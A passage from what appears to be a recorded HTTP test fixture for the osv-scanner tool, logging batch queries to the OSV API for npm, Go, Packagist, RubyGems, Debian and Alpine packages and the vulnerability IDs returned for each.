"DLA-3878-1", "modified": "2026-03-09T01:20:38.676387Z" }, { "id": "DLA-4064-1", "modified": "2026-03-09T01:20:30.558703Z" }, { "id": "DLA-4146-1", "modified": "2026-03-09T01:22:43.732573Z" }, { "id": "DLA-4251-1", "modified": "2026-03-09T02:11:12.986866Z" }, { "id": "DLA-4319-1", "modified": "2025-09-30T22:17:08.381361Z" }, { "id": "DSA-5142-1", "modified": "2026-03-09T02:10:58.737631Z" }, { "id": "DSA-5271-1", "modified": "2026-03-09T02:10:55.154283Z" }, { "id": "DSA-5391-1", "modified": "2026-03-09T02:09:39.164621Z" }, { "id": "DSA-5949-1", "modified": "2026-03-09T02:09:32.257423Z" }, { "id": "DSA-5990-1", "modified": "2025-08-29T13:01:48.117026Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2018-0732", "modified": "2025-11-19T02:02:54.249966Z" }, { "id": "DEBIAN-CVE-2018-0734", "modified": "2025-11-19T02:02:43.768735Z" }, { "id": "DEBIAN-CVE-2018-0735", "modified": "2025-11-19T01:19:04.251217Z" }, { "id": "DEBIAN-CVE-2018-5407", "modified": "2025-11-19T01:02:00.203143Z" }, { "id": "DEBIAN-CVE-2019-1543", "modified": "2025-11-19T01:12:34.981629Z" }, { "id": "DEBIAN-CVE-2019-1547", "modified": "2025-11-19T01:12:35.687253Z" }, { "id": "DEBIAN-CVE-2019-1549", "modified": "2025-11-19T01:04:40.924710Z" }, { "id": "DEBIAN-CVE-2019-1551", "modified": "2025-11-19T01:19:08.067279Z" }, { "id": "DEBIAN-CVE-2019-1563", "modified": "2025-11-19T02:04:34.392400Z" }, { "id": "DEBIAN-CVE-2020-1967", "modified": "2025-11-19T02:04:38.886020Z" }, { "id": "DEBIAN-CVE-2020-1971", "modified": "2025-11-19T02:04:28.520483Z" }, { "id": "DEBIAN-CVE-2021-23840", "modified": "2025-11-19T01:03:14.356310Z" }, { "id": "DEBIAN-CVE-2021-23841", "modified": "2025-11-19T02:02:54.160482Z" }, { "id": "DEBIAN-CVE-2021-3449", "modified": "2025-11-19T01:04:41.495834Z" }, { "id": "DEBIAN-CVE-2021-3450", "modified": "2025-11-19T02:01:16.123253Z" }, { "id": "DEBIAN-CVE-2021-3711", "modified": "2025-11-20T10:15:44.121033Z" }, { "id": "DEBIAN-CVE-2021-3712", "modified": "2025-11-20T10:15:44.130193Z" }, { "id": "DEBIAN-CVE-2021-4160", "modified": "2025-11-20T10:15:10.185497Z" }, { "id": "DEBIAN-CVE-2022-0778", "modified": "2025-11-20T10:15:47.332694Z" }, { "id": "DEBIAN-CVE-2022-1292", "modified": "2025-11-20T10:15:25.471825Z" }, { "id": "DEBIAN-CVE-2022-2068", "modified": "2025-11-20T10:15:27.022420Z" }, { "id": "DEBIAN-CVE-2022-2097", "modified": "2025-11-20T10:15:27.065089Z" }, { "id": "DEBIAN-CVE-2022-2274", "modified": "2025-11-19T02:02:45.418259Z" }, { "id": "DEBIAN-CVE-2022-3358", "modified": "2025-11-19T01:06:25.721124Z" }, { "id": "DEBIAN-CVE-2022-3602", "modified": "2025-11-19T01:12:35.687556Z" }, { "id": "DEBIAN-CVE-2022-3786", "modified": "2025-11-19T01:19:02.748977Z" }, { "id": "DEBIAN-CVE-2022-3996", "modified": "2025-11-19T02:01:16.596616Z" }, { "id": "DEBIAN-CVE-2022-4203", "modified": "2025-11-19T02:01:16.313531Z" }, { "id": "DEBIAN-CVE-2022-4304", "modified": "2025-11-20T10:16:04.313466Z" }, { "id": "DEBIAN-CVE-2022-4450", "modified": "2025-11-20T10:16:05.367442Z" }, { "id": "DEBIAN-CVE-2023-0215", "modified": "2025-11-20T10:16:27.838296Z" }, { "id": "DEBIAN-CVE-2023-0216", "modified": "2025-11-19T02:04:35.947667Z" }, { "id": "DEBIAN-CVE-2023-0217", "modified": "2025-11-19T01:12:37.272749Z" }, { "id": "DEBIAN-CVE-2023-0286", "modified": "2025-11-20T10:16:27.985311Z" }, { "id": "DEBIAN-CVE-2023-0401", "modified": "2025-11-19T01:12:36.298552Z" }, { "id": "DEBIAN-CVE-2023-0464", "modified": "2025-11-20T10:16:28.057931Z" }, { "id": "DEBIAN-CVE-2023-0465", "modified": "2025-11-20T10:16:28.143046Z" }, { "id": "DEBIAN-CVE-2023-0466", "modified": "2025-11-20T10:16:28.053837Z" }, { "id": "DEBIAN-CVE-2023-1255", "modified": "2025-11-19T01:08:49.387669Z" }, { "id": "DEBIAN-CVE-2023-2650", "modified": "2025-11-20T10:17:34.439123Z" }, { "id": "DEBIAN-CVE-2023-2975", "modified": "2025-11-20T10:16:36.112183Z" }, { "id": "DEBIAN-CVE-2023-3446", "modified": "2025-11-20T10:16:38.860251Z" }, { "id": "DEBIAN-CVE-2023-3817", "modified": "2025-11-20T10:17:35.737266Z" }, { "id": "DEBIAN-CVE-2023-5363", "modified": "2025-11-20T10:16:59.430619Z" }, { "id": "DEBIAN-CVE-2023-5678", "modified": "2025-11-20T10:17:38.719690Z" }, { "id": "DEBIAN-CVE-2023-6129", "modified": "2025-11-20T10:17:39.029757Z" }, { "id": "DEBIAN-CVE-2023-6237", "modified": "2025-11-20T10:17:39.218097Z" }, { "id": "DEBIAN-CVE-2024-0727", "modified": "2025-11-20T10:17:01.258658Z" }, { "id": "DEBIAN-CVE-2024-12797", "modified": "2025-11-19T02:04:36.131726Z" }, { "id": "DEBIAN-CVE-2024-13176", "modified": "2026-03-17T02:49:44.824285Z" }, { "id": "DEBIAN-CVE-2024-2511", "modified": "2025-11-20T10:17:05.139581Z" }, { "id": "DEBIAN-CVE-2024-4603", "modified": "2025-11-20T10:17:43.955114Z" }, { "id": "DEBIAN-CVE-2024-4741", "modified": "2025-11-20T10:17:26.990307Z" }, { "id": "DEBIAN-CVE-2024-5535", "modified": "2025-11-20T10:17:48.194687Z" }, { "id": "DEBIAN-CVE-2024-6119", "modified": "2025-11-20T10:17:53.824117Z" }, { "id": "DEBIAN-CVE-2024-9143", "modified": "2025-11-20T10:17:55.864918Z" }, { "id": "DEBIAN-CVE-2025-11187", "modified": "2026-03-17T02:47:10.761659Z" }, { "id": "DEBIAN-CVE-2025-15467", "modified": "2026-03-17T02:51:11.866899Z" }, { "id": "DEBIAN-CVE-2025-15468", "modified": "2026-03-17T02:51:12.304672Z" }, { "id": "DEBIAN-CVE-2025-15469", "modified": "2026-03-17T02:51:12.299847Z" }, { "id": "DEBIAN-CVE-2025-27587", "modified": "2026-03-17T02:51:34.552234Z" }, { "id": "DEBIAN-CVE-2025-4575", "modified": "2025-11-19T02:02:43.971243Z" }, { "id": "DEBIAN-CVE-2025-66199", "modified": "2026-03-17T02:52:26.091887Z" }, { "id": "DEBIAN-CVE-2025-68160", "modified": "2026-03-17T02:50:42.645267Z" }, { "id": "DEBIAN-CVE-2025-69418", "modified": "2026-03-17T02:51:22.404226Z" }, { "id": "DEBIAN-CVE-2025-69419", "modified": "2026-03-17T02:51:22.497785Z" }, { "id": "DEBIAN-CVE-2025-69420", "modified": "2026-03-17T02:51:22.651361Z" }, { "id": "DEBIAN-CVE-2025-69421", "modified": "2026-03-17T02:51:22.561721Z" }, { "id": "DEBIAN-CVE-2025-9230", "modified": "2026-03-17T02:51:39.764914Z" }, { "id": "DEBIAN-CVE-2025-9231", "modified": "2026-03-17T02:51:39.727656Z" }, { "id": "DEBIAN-CVE-2025-9232", "modified": "2026-03-17T02:51:39.882696Z" }, { "id": "DEBIAN-CVE-2026-22795", "modified": "2026-03-17T02:51:47.646020Z" }, { "id": "DEBIAN-CVE-2026-22796", "modified": "2026-03-17T02:51:47.743030Z" }, { "id": "DEBIAN-CVE-2026-2673", "modified": "2026-03-18T09:03:28.363302Z" }, { "id": "DLA-3008-1", "modified": "2026-03-09T01:23:33.375630Z" }, { "id": "DLA-3325-1", "modified": "2026-03-09T01:19:40.983935Z" }, { "id": "DLA-3449-1", "modified": "2026-03-09T01:22:47.322805Z" }, { "id": "DLA-3530-1", "modified": "2026-03-09T01:19:28.929204Z" }, { "id": "DLA-3942-1", "modified": "2026-03-09T01:22:40.686044Z" }, { "id": "DLA-3942-2", "modified": "2026-03-09T01:21:01.728730Z" }, { "id": "DLA-4176-1", "modified": "2026-03-09T01:20:23.459313Z" }, { "id": "DLA-4321-1", "modified": "2025-10-03T16:33:24.717173Z" }, { "id": "DLA-4490-1", "modified": "2026-02-23T10:30:28.927832Z" }, { "id": "DSA-4539-1", "modified": "2026-03-09T02:09:20.276054Z" }, { "id": "DSA-4539-3", "modified": "2025-05-26T07:05:14.261652Z" }, { "id": "DSA-4661-1", "modified": "2026-03-09T02:08:53.792348Z" }, { "id": "DSA-4807-1", "modified": "2026-03-09T02:10:20.442914Z" }, { "id": "DSA-4855-1", "modified": "2026-03-09T02:11:29.405206Z" }, { "id": "DSA-4875-1", "modified": "2026-03-09T02:10:05.387501Z" }, { "id": "DSA-4963-1", "modified": "2026-03-09T02:10:15.488747Z" }, { "id": "DSA-5103-1", "modified": "2026-03-09T02:09:42.407559Z" }, { "id": "DSA-5139-1", "modified": "2026-03-09T02:09:17.334653Z" }, { "id": "DSA-5169-1", "modified": "2026-03-09T02:09:37.692763Z" }, { "id": "DSA-5343-1", "modified": "2026-03-09T02:09:47.149297Z" }, { "id": "DSA-5417-1", "modified": "2026-03-09T02:09:39.950679Z" }, { "id": "DSA-5532-1", "modified": "2026-03-09T02:08:31.395482Z" }, { "id": "DSA-5764-1", "modified": "2026-03-09T02:09:02.723874Z" }, { "id": "DSA-6015-1", "modified": "2025-10-01T13:32:01.848986Z" }, { "id": "DSA-6113-1", "modified": "2026-01-27T20:30:04.397078Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2011-4116", "modified": "2025-11-20T10:10:50.058601Z" }, { "id": "DEBIAN-CVE-2017-12837", "modified": "2025-11-19T01:03:14.361068Z" }, { "id": "DEBIAN-CVE-2017-12883", "modified": "2025-11-19T01:12:38.323688Z" }, { "id": "DEBIAN-CVE-2018-12015", "modified": "2025-11-19T02:02:49.033339Z" }, { "id": "DEBIAN-CVE-2018-18311", "modified": "2025-11-19T01:12:36.918544Z" }, { "id": "DEBIAN-CVE-2018-18312", "modified": "2025-11-19T02:04:33.584277Z" }, { "id": "DEBIAN-CVE-2018-18313", "modified": "2025-11-19T01:06:24.154928Z" }, { "id": "DEBIAN-CVE-2018-18314", "modified": "2025-11-19T01:12:35.416886Z" }, { "id": "DEBIAN-CVE-2018-6797", "modified": "2025-11-19T02:04:23.831823Z" }, { "id": "DEBIAN-CVE-2018-6798", "modified": "2025-11-19T02:02:49.628171Z" }, { "id": "DEBIAN-CVE-2018-6913", "modified": "2025-11-19T02:02:50.593437Z" }, { "id": "DEBIAN-CVE-2020-10543", "modified": "2025-11-19T01:04:39.904198Z" }, { "id": "DEBIAN-CVE-2020-10878", "modified": "2025-11-19T01:12:35.457057Z" }, { "id": "DEBIAN-CVE-2020-12723", "modified": "2025-11-19T02:02:47.094787Z" }, { "id": "DEBIAN-CVE-2020-16156", "modified": "2025-11-20T10:14:36.701112Z" }, { "id": "DEBIAN-CVE-2021-36770", "modified": "2025-11-20T10:15:44.080114Z" }, { "id": "DEBIAN-CVE-2022-48522", "modified": "2025-11-19T01:08:52.915564Z" }, { "id": "DEBIAN-CVE-2023-31484", "modified": "2025-11-20T10:17:35.627220Z" }, { "id": "DEBIAN-CVE-2023-31486", "modified": "2026-03-17T02:48:35.857896Z" }, { "id": "DEBIAN-CVE-2023-47038", "modified": "2025-11-20T10:16:46.343364Z" }, { "id": "DEBIAN-CVE-2024-56406", "modified": "2025-11-20T10:17:48.686371Z" }, { "id": "DEBIAN-CVE-2025-40909", "modified": "2025-11-20T10:18:21.143971Z" }, { "id": "DLA-3926-1", "modified": "2026-03-09T01:20:46.118633Z" }, { "id": "DSA-5902-1", "modified": "2026-03-09T02:09:19.793163Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3072-1", "modified": "2026-03-09T01:22:24.680239Z" }, { "id": "DLA-3189-1", "modified": "2025-05-26T07:01:07.887113Z" }, { "id": "DLA-3316-1", "modified": "2025-05-26T07:01:13.127412Z" }, { "id": "DLA-3422-1", "modified": "2026-03-09T01:20:56.692752Z" }, { "id": "DLA-3600-1", "modified": "2026-03-09T01:17:49.966197Z" }, { "id": "DLA-3651-1", "modified": "2026-03-09T01:18:05.310519Z" }, { "id": "DLA-3764-1", "modified": "2026-03-09T01:23:22.273526Z" }, { "id": "DSA-5135-1", "modified": "2026-03-09T02:11:21.646978Z" } ] }, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2017-17512", "modified": "2025-11-19T02:04:30.656495Z" } ] }, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2005-2541", "modified": "2026-03-17T02:42:47.789952Z" }, { "id": "DEBIAN-CVE-2018-20482", "modified": "2025-11-19T02:02:47.070832Z" }, { "id": "DEBIAN-CVE-2019-9923", "modified": "2025-11-19T02:02:53.559001Z" }, { "id": "DEBIAN-CVE-2021-20193", "modified": "2025-11-19T01:01:55.139356Z" }, { "id": "DEBIAN-CVE-2022-48303", "modified": "2025-11-20T10:16:07.552593Z" }, { "id": "DEBIAN-CVE-2023-39804", "modified": "2025-11-20T10:16:41.587973Z" }, { "id": "DLA-3755-1", "modified": "2026-03-09T01:18:04.185679Z" } ] }, { "vulns": [ { "id": "DLA-3051-1", "modified": "2025-05-26T07:01:56.257796Z" }, { "id": "DLA-3134-1", "modified": "2025-05-26T07:01:01.500124Z" }, { "id": "DLA-3161-1", "modified": "2025-05-26T07:01:03.882213Z" }, { "id": "DLA-3366-1", "modified": "2025-05-26T07:01:17.027142Z" }, { "id": "DLA-3412-1", "modified": "2025-05-26T07:01:20.109212Z" }, { "id": "DLA-3684-1", "modified": "2025-05-26T07:01:38.953691Z" }, { "id": "DLA-3788-1", "modified": "2025-05-26T07:01:46.700929Z" }, { "id": "DLA-3972-1", "modified": "2025-05-26T07:02:05.284676Z" }, { "id": "DLA-4085-1", "modified": "2025-05-26T07:02:10.958749Z" }, { "id": "DLA-4105-1", "modified": "2025-05-26T07:02:13.921097Z" }, { "id": "DLA-4403-1", "modified": "2025-12-12T10:13:37.154747Z" } ] }, { "vulns": [ { "id": "DLA-4016-1", "modified": "2025-05-26T07:02:06.504254Z" } ] }, { "vulns": [ { "id": "DEBIAN-CVE-2016-2779", "modified": "2025-11-19T01:12:38.591462Z" }, { "id": "DEBIAN-CVE-2018-7738", "modified": "2025-11-20T10:13:54.493707Z" }, { "id": "DEBIAN-CVE-2021-37600", "modified": "2025-11-19T02:02:43.997954Z" }, { "id": "DEBIAN-CVE-2021-3995", "modified": "2025-11-20T10:15:45.587792Z" }, { "id": "DEBIAN-CVE-2021-3996", "modified": "2025-11-20T10:15:45.602424Z" }, { "id": "DEBIAN-CVE-2022-0563", "modified": "2026-03-17T02:46:43.123134Z" }, { "id": "DEBIAN-CVE-2024-28085", "modified": "2025-11-20T10:17:41.612682Z" }, { "id": "DEBIAN-CVE-2025-14104", "modified": "2026-03-05T17:00:58.361610Z" }, { "id": "DEBIAN-CVE-2026-3184", "modified": "2026-02-26T09:30:44.219098Z" }, { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" }, { "id": "DSA-5055-1", "modified": "2026-03-09T02:10:40.826335Z" }, { "id": "DSA-5650-1", "modified": "2026-03-09T02:08:30.371343Z" } ] }, { "vulns": [ { "id": "DEBIAN-CVE-2022-1271", "modified": "2025-11-20T10:15:47.940295Z" }, { "id": "DEBIAN-CVE-2024-3094", "modified": "2025-11-19T01:12:34.542011Z" }, { "id": "DEBIAN-CVE-2025-31115", "modified": "2025-11-20T10:18:07.484724Z" }, { "id": "DSA-5123-1", "modified": "2026-03-09T02:10:46.054497Z" }, { "id": "DSA-5895-1", "modified": "2026-03-09T02:08:52.515269Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] } ] } headers: Content-Length: - "22298" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/gh-annotations_with_vulns url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 95 body: | { "results": [ { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] } ] } headers: Content-Length: - "95" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 263 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.24.4" }, { "package": { "ecosystem": "Go", "name": "toolchain" }, "version": "1.24.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/go_packages_in_osv-scanner.json_format url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 1549 body: | { "results": [ { "vulns": [ { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] }, { "vulns": [ { "id": "GO-2025-3828", "modified": "2026-02-04T03:33:13.542630Z" }, { "id": "GO-2026-4339", "modified": "2026-02-04T04:20:19.626029Z" }, { "id": "GO-2026-4433", "modified": "2026-03-02T10:44:08.411132Z" } ] } ] } headers: Content-Length: - "1549" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/ignores_without_reason_should_be_explicitly_called_out url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 95 body: | { "results": [ { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] } ] } headers: Content-Length: - "95" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1024 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" }, { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/ignoring_.gitignore url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 37 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "37" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/json_output url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 278 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/nested_directories_are_checked_when_`--recursive`_is_passed url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/no_lockfiles_with_recursion_and_with_allow_flag_are_fine url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/no_lockfiles_with_recursion_but_without_allow_flag_are_fine url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/one_specific_supported_lockfile url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/one_specific_supported_lockfile_with_ignore url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 95 body: | { "results": [ { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] } ] } headers: Content-Length: - "95" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/one_specific_supported_lockfile_with_offline_explicitly_false url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1852 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.10-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/one_specific_supported_sbom_with_duplicate_PURLs url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 433 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] } ] } headers: Content-Length: - "433" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1852 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.10-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/one_specific_supported_sbom_with_duplicate_PURLs_using_-L_flag url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 433 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": 